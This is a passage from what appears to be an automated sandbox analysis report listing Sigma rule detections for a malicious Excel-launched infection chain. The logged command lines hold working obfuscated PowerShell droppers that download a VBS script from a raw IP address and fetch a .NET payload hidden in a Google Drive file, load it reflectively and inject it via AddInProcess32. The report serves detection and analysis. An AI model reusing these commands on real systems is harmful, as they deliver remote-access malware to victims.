IsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4008, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe, ProcessId: 3116, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4008, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , ProcessId: 3028, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0n

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4008, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline", ProcessId: 3328, ProcessName: csc.exe

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 5.159.62.244, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3596, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4008, TargetFilename: C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3596, Protocol: tcp, SourceIp: 5.159.62.244, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdes

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdes

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4008, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , ProcessId: 3028, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4008, TargetFilename: C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3596, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjR